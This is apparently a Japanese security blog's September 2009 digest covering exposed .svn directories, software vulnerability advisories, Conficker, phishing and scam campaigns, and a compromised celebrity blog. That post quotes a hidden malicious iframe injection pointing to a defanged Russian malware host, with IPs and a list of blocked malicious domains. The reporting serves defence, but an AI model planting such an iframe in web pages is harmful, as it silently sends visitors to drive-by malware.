初歩的な管理ミスで3300もの有名サイトがソースコードを盗まれる
の手口はかなり前からよく知られているもので、アプリケーションの欠陥というよりもサーバの管理者やデベロッパの不注意につけ込む。Subversion のメタデータはデベロッパがコードの作業用コピーを置く場所で、Webを訪れる人間が見る場所ではない。でも、この不注意はきわめて多く、しかも悪用されやすい。バージョンコントロールのメタデータのディレクトリは、’.svn’とか’.cvs’だから見つけるのも簡単だ。たとえば、こんなパスになる: http://www.test.com/.svn/。

NetBeansなんかでも、不注意に public_htmlの生成先を指定すると、.svn がモロに転送されてしまいます（笑）
気をつけましょう

----------
namazu 2.0.20

Namazuにバッファオーバーランの脆弱性、最新版で対処
Namazu Projectは9月23日、オープンソースの日本語全文検索システム「Namazu」の最新版となるバージョン 2.0.20をリリースした。バッファオーバーランの脆弱性に対処している。

----------
Mal-Google Reader

Google Readerを利用したスパム
「へぇ、スパムとかマルウェア配布向きの、なんていいサービスなんだ」と思ってしまうのは心が汚れているのかも、、、

まっさきにそう考えた私も、相当汚れているようです orz..

----------
EoF

清掃の日
廃棄物の処理及び清掃に関する法律が施行されたことに由来。

南洲忌
西郷隆盛の命日
西南戦争終結の日

----------
Conficker never died

最近あまり騒がれなくなった Conficker/Downadup/Kido ですが

Addendum to SRI's Conficker C Analysis Published

SRIが Conficker C の P2Pネットワーク経由での C&C伝播に関してレポートしています。
An Analysis of Conficker's Logic and Rendezvous Points

また、ZDnetによれば、
From Gimmiv to Conficker: The lucrative MS08-067 flaw

現在でも5,000,000の感染ボットが存在しているとしています。

まぁ・・MS08-067(2008.10.24)を、現在でも未適用のような環境は、「論外」というしかないわけですが、こういった例もありますので、一応注意喚起でもしておきましょうか？

東大病院のウイルス感染はUSBメモリ経由、「MS08-067」未適用 -- 2009.03.09

----------
iTunes 9.0.1

About the security content of iTunes 9.0.1
A buffer overflow exists in the handling of .pls files. Opening a maliciously crafted .pls file may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. Credit to Roger Hart of IP3, and Steven Woolley at Oogli LLC for reporting this issue.
悪意をもって作成された(Malcrafted).pls ファイルを実行させられることにより、任意コード実行の可能性があった問題の修正
iTunes 使用中の方は、ヘルプ→更新ファイルを確認からアップデートしてください。

----------
時間切れ・・かな

EoF

IRCとMailで指摘を受けてごそごそ調査していましたが、裏取りが終わりましたのでちょっとレポ

某タレントのBlogが攻撃を受けているという情報が飛び交い始めたのが 9/18 頃の話で、キャッシュを探したのですが、見つけられませんでした。
しかし、中国の悪名高い Baidu-Spiderのキャッシュに
＜iframe src="hXXp://soul-of-man.ru:8080:8080/ts/in.cgi?sony" width=650 height=0 style="visibility: hidden"＞＜/iframe＞
という文字列が残されていました。

なんで8080を二重に設定してるのかは謎ですが、同様のインジェクションは他にも見つかりますので、恐らく自動で差し込まれたものでしょう。
あと、sony ってのも謎ですね（笑）

IP:

80.69.74.73		TransIP B.V
85.17.237.5		LEASEWEB
91.121.7.26		OVH ISP Paris
91.121.121.6
91.121.134.229

TranceIPは新顔ですね

既に何度も紹介しているように、汚染の手口は旧態依然のものです。
Microsoft(Windows) Update
Adobe (Acrobat) Reader
Adobe Flash Player
Mozilla Firefox
を常に最新にしておけば感染することはありません。

この攻撃が本当に Gumblar/GENO のものなのかどうかは確証がありませんが、8080インジェクションが同じグループに関係が深いことは様々なセキュリティ機関が指摘しています。
個人的な感想を言えば Gumblarのような緻密さが感じられないのですが・・・
※難読化も分割も行っていないストレートな方法です。

IP 80.69.74.73 収容のドメイン群・・・
収容されているIP群はおなじみのものも多数存在します。

18-plus.ru	not yet	THROUGH
39u.ru	638	BLOCKED
3b4.ru	96	BLOCKED
3bf.ru	561	BLOCKED
3cw.ru	437	BLOCKED
80-69-74-73.colo.transip.net	not yet	THROUGH
a5h.ru	295	BLOCKED
a5i.at	17	BLOCKED
age-bio.ru	1094	BLOCKED
age-inf.ru	not yet	THROUGH
autobestwestern.cn	90days ago	BLOCKED
beachhousename.cn	747	BLOCKED
bestfindit.cn	90days ago	BLOCKED
betworldwager.cn	89	BLOCKED
bigtopcabaret.cn	90days ago	BLOCKED
bigtopcreative.cn	546	BLOCKED
bigtopfestival.cn	84	BLOCKED
bigtopliteworld.cn	90days ago	BLOCKED
bigtoplotto.cn	205	BLOCKED
bigtopstudios.cn	452	BLOCKED
bio-a.ru	0(benign)	THROUGH
bio-age.ru	not yet	THROUGH
c1z.at	587	BLOCKED
c8k.ru	312	BLOCKED
c8t.ru	not yet	BLOCKED
casinoslotbet.cn	488	BLOCKED
ce5.ru	254	BLOCKED
ciqx.in	465	BLOCKED
coolnamemart.cn	581	BLOCKED
dima-bilan-gey.ru	not yet	THROUGH
dub-dubom.ru	not yet	THROUGH
f6e.ru	201	BLOCKED
findbigthinker.cn	90days ago	BLOCKED
gasa.in	4	BLOCKED
giantbest.cn	201	BLOCKED
giantnonfat.cn	90days ago	BLOCKED
hugetopnonfat.cn	183	BLOCKED
inhouselabel.cn	30	BLOCKED
iq-mozgi.ru	not yet	THROUGH
liteautorepair.cn	90days ago	BLOCKED
litefinestdirect.cn	94	BLOCKED
litetopfindguide.cn	746	BLOCKED
liteupyourride.cn	220	BLOCKED
lotmachinesguide.cn	445	BLOCKED
mixmediadirect.cn	428	BLOCKED
mybetsportswager.cn	347	BLOCKED
namecompanystore.cn	11	BLOCKED
nameshopinternational.cn	131	BLOCKED
namezeroshop.cn	377	BLOCKED
nonfathighestlocate.cn	349	BLOCKED
ns5.litetopdetect.cn	90days ago	BLOCKED
pornomig.ru	not yet	THROUGH
professional-test.ru	not yet	THROUGH
q0w.ru	308	BLOCKED
q3o.ru	183	BLOCKED
q5n.ru	90days ago	BLOCKED
rbgt.in	179	BLOCKED
russkitrax.ru	not yet	THROUGH
shoppicturelife.cn	422	BLOCKED
superorgazm.ru	not yet	THROUGH
t-age.ru	not yet	THROUGH
test-health.ru	not yet	THROUGH
thehomename.cn	156	BLOCKED
u1x.ru	90	BLOCKED
u3h.ru	363	BLOCKED
u6v.ru	124	BLOCKED
u8v.ru	101	BLOCKED
ultralitecar.cn	424	BLOCKED
uppd.in	284	BLOCKED
www.inhouselabel.cn	30	BLOCKED
www.litecarfinestsite.cn	216	BLOCKED
www.u8r.ru	266	BLOCKED
www.xg8.ru	150	BLOCKED
x0c.ru	524	BLOCKED
x0v.ru	596	BLOCKED
x3a.ru	336	BLOCKED
x3b.ru	539	BLOCKED
x6h.ru	2	BLOCKED
x7d.ru	2349	BLOCKED
x8n.ru	1323	BLOCKED
x8y.ru	122	BLOCKED
x9d.ru	1	BLOCKED
x9f.ru	1494	BLOCKED
x9m.ru	579	BLOCKED
x9v.ru	112	BLOCKED
xb4.ru	90	BLOCKED
xc6.ru	113	BLOCKED
xg8.ru	150	BLOCKED
xj4.ru	143	BLOCKED
xq1.ru	90days ago	BLOCKED
xq8.ru	90days ago	BLOCKED
xv8.ru	90days ago	BLOCKED
xv9.ru	509	BLOCKED
yourlitetopfind.cn	90days ago	BLOCKED
zeyc.in	235	BLOCKED

春分
昼と夜の長さがほぼ同じになる日。

で、祝日制定の理由は、
祝日法では「祖先をうやまい、なくなった人々をしのぶ」ことを趣旨としている。1947年までは、秋季皇霊祭という祭日だった。

海王星(Neptune)の日
ヨハン・ガレが1846年9月23日に初めて海王星を観測した日

独立記念日 サウジアラビア

----------
マルウェア・ウィルス対策はOSベンダーの責務かどうか？

この命題は非常に難しい部分です。

Microsoftがマルウェア対策をすれば、Symantecから噛み付かれたことは旧知の事実ですし、MSE(Morro)のリリースには、独占禁止法違反をちらつかせて様々なセキュリティベンダーが生き残りを賭した機能強化に邁進しています。

他方で、AppleがiPhone OS3.1のアップデートを iTouchに対して有料化したことで、セキュリティアップデートは有料にすべきではないという議論が持ち上がったことも事実で、この二律背反したファセットをどう解決すべきなのでしょうか？

Should "Patch Tuesday" updates include a free virus scan?
誰もマルウェアなんか望んでないのは当然のことです。では、Windows Updateは毎月の火曜日にやってくるわけですが、そのパッチ内にマルウェアスキャンを加えるべきでしょうか？

I would say "YES PLEASE!"

参考：
セキュリティ・ベンダーとMicrosoftの衝突が再び勃発 -- 2009.07.09

----------
マルポリー

モノポリー(Monopoly)は世界中で親しまれているボードゲームの一つです・・・が？

Online ‘Monopoly’ a Reminder That Spammers Don’t Play Fair
モノポリーを遊びませんか？と「○○さん」から招待がありました。
という文面のメールが誘導するのは、当然トロイの木馬です。
hXXp://Monopoly2009.com/

ちなみに、monopoly.exe (2009.09.23 08-AM-JST頃) の結果
01246445.DAT:Worm Result: 0/41 (0.00%)
をぃをぃ・・

※MD5ミスでした
こっち >>
File monopoly.ex3 received on 2009.09.21 04:10:03 (UTC) 22/41 (53.66%)

Fake Monopoly Game Downloader

----------
ナイジェリアより

ナイジェリアの手紙
アフリカ地域（主にナイジェリア）を舞台に多発している国際的詐欺の一種であり、先進国など豊かな国に住む人から、手紙やファクシミリ、電子メールを利用して金を騙し取ろうとする詐欺である。現在では電子メールで行われることが多い。
まぁ、欲の皮の突っ張った人向けのScum（詐欺）ですね～
でも、大手メディアのお墨付き（のようなもの）が添付されているとしたら？

BBC sending Nigerian scam?
恐らく、bbc.co.uk のアカウントの一つがクラックされたのか漏洩したかしたのでしょうが・・・

Heir Hunters は生活とお金のカテゴリーであって、ニュースではない
BBCはBBcではない
なんで、yahoo.com.hkに英国のBBCからメールを収集する必要があるの？

----------
ESTA詐欺

電子渡航認証システム(ESTA)
ビザ免除プログラム（VWP）参加国からの入国者に対し、米国出入国カード（I-94W）を米国への渡航（米国を経由して他国へ渡航する場合も含む）前にオンラインで申請することを義務付けるものである。尚、申請等は無料です。

が・・・
ESTA scam
A reader by the name of AK wrote in and advise us that some possible scam sites are on the Internet charging a fee for people to apply to the ESTA program. No words on whether the applicants actually get the ESTA with the scam sites or if the information are stolen for other purposes.

日本でも同様の詐欺が横行している模様：（個人サイト）
ESTA詐欺にご注意！

ESTA申請は無料です

----------
VLC and FFmpeg

OSSのクロスプラットフォーム・メディアプレイヤーの VLC にまたもや脆弱性が指摘され、アドバイザリが出されています。

VLC Media Player Multiple Buffer Overflow Vulnerabilities
指標4:Highly Critical
Security Advisory 0901
VLC media player 1.0.2 addresses this issue. Patches for older versions are available from the official VLC source code repository 1.0-bugfix branch.

最新版: 1.0.2

また、動画や音声などのファイル・ストリームの変換ユーティリティ FFmpegにも複数の脆弱性が指摘されています。

ffmpeg Multiple Vulnerabilities
指標3:Moderately critical

現時点での最新版 0.5 も影響下にあり、DoSおよび、潜在的なリモートコードの可能性ということになっています。いくつかのSVNリポジトリ上で修正が上げられている最中のようです。

使用中の方は今後のバージョンアップ情報に留意してください。

---------
GMail pushes come along iPhone, by Microsoft

Google Sync: Now with push Gmail support

iPhoneでとうとうGmailのプッシュ通知が実現―意外にもMicrosoftのおかげ
Googleが自社のアプリをiPhoneで作動させるために、今回も自分自身で手を下したというのがおもしろい。携帯用位置情報アプリのGoogleLaititudeをAppleがネーティブ・アプリとして受け入れることを拒否したとき、GoogleはSafariで作動するウェブ・アプリを作ってiPhoneユーザーに提供した。それに―もちろん、もちろん―われわれはAppleが現在拒否しているGoogle VoiceがiPhone上で作動するようになることを期待している。

苦笑

---------
Dedicated to H.G Wells

A mysterious series for H.G. Wells

一連の（妙な）TopロゴはH.G.ウェルズの誕生日を祝ったものだったそうです・・
もうちょっとヒネりがほしかったかな？（笑）

EoF